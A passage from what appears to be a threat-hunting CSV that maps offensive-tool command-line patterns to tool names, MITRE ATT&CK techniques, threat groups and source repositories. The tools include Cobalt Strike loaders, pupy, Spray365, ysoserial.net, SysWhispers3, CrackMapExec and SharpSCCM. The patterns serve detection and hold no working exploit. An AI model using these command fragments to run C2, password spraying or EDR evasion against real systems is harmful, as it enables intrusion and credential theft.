T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -format=service-exe *.exe*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* fox-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* freelancer-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* Freeze.rs/*,offensive_tool_keyword,Freeze.rs,Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST,T1548.004,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze.rs,1,1,N/A,N/A,7,665,70,2023-08-18T17:26:44Z,2023-05-03T16:04:47Z -* ftp-anon.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ftp-bounce.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ftp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ftp-libopie.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ftp-log4shell.nse*,offensive_tool_keyword,nmap,Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Diverto/nse-log4shell,1,0,N/A,N/A,4,347,51,2021-12-20T15:34:21Z,2021-12-12T22:52:02Z -* ftp-proftpd-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* FtpSniffer *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* ftp-syst.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ftp-vsftpd-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ftp-vuln-cve2010-4221.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* FudgeC2 *,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -* -FullPrivs * ,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --functions NtProtectVirtualMemory*NtWriteVirtualMemory -o syscalls_mem*,offensive_tool_keyword,SysWhispers3,SysWhispers on Steroids - AV/EDR evasion via direct system calls.,T1059 - T1573 - T1218 - T1216,TA0002 - TA0008 - TA0011,N/A,N/A,Defense Evasion,https://github.com/klezVirus/SysWhispers3,1,0,N/A,N/A,10,1006,148,2023-03-22T19:23:21Z,2022-03-07T18:56:21Z -* fuzz -u * -p *--target*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,0,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -* FUZZ:FUZZ *,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* --fuzzers addition*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers bitsquatting*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers cyrillic*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers dictionary*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers homoglyph*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers hyphenation*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers insertion*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers omission*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers repetition*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers replacement*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers subdomain*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers transposition*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers vowel-swap*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* -g ActivitySurrogateSelector*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* -g ClaimsPrincipal *,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* -g -n --kerberoast*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -g PSObject *,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* -g TextFormattingRunProperties *,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* --gadget ActivitySurrogateSelector*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* --gadget ClaimsPrincipal *,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* --gadget PSObject *,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* ganglia-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* GC2-sheet*,offensive_tool_keyword,GC2-sheet,GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.,T1071.002 - T1560 - T1105,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/looCiprian/GC2-sheet,1,0,N/A,10,10,449,89,2023-07-06T19:22:36Z,2021-09-15T19:06:12Z -* gcat.py -*,offensive_tool_keyword,gcat,A PoC backdoor that uses Gmail as a C&C server,T1071.001 - T1094 - T1102.002,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/byt3bl33d3r/gcat,1,0,N/A,10,10,1300,466,2018-11-16T13:43:15Z,2015-06-03T01:28:00Z -* gen -f client -O windows -A x64*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* gen -S -f client -O windows -A x64*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* generate audit -ep *--passwords_in_userfile*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,0,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -* generate normal -ep * -d * -u * -pf *,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,0,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -* generate normal -ep ex-plan.s365 *,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,0,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -* generate_my_dll*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,0,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -* generatePayload*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* --gen-relay-list *,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* --gen-relay-list /tmp/relaylistOutputFilename.txt*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* get class-instances SMS_R_System *,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* get class-properties SMS_Admin*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - 